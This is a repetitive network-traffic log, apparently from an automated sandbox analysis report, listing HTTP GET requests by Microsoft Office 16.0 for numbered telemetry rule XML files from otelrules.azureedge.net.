Source: global trafficHTTP traffic detected: GET /rules/rule120629v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120628v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120630v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120631v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120633v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120634v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120632v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120635v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120638v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120636v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120639v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120637v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120640v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120642v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120643v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120641v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120644v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120645v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120647v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120646v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120648v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120649v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120652v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120653v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120654v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120655v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120657v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120656v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120659v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120658v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120660v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120661v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120662v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120663v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120664v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120667v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120668v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120665v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120666v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120669v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120670v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120671v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120672v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120673v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120674v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120675v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120677v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120676v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120678v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120680v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120679v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120682v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120681v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120602v10s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120601v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule224901v11s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700401v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700400v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703901v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703351v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703350v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703500v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703501v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703401v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703400v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
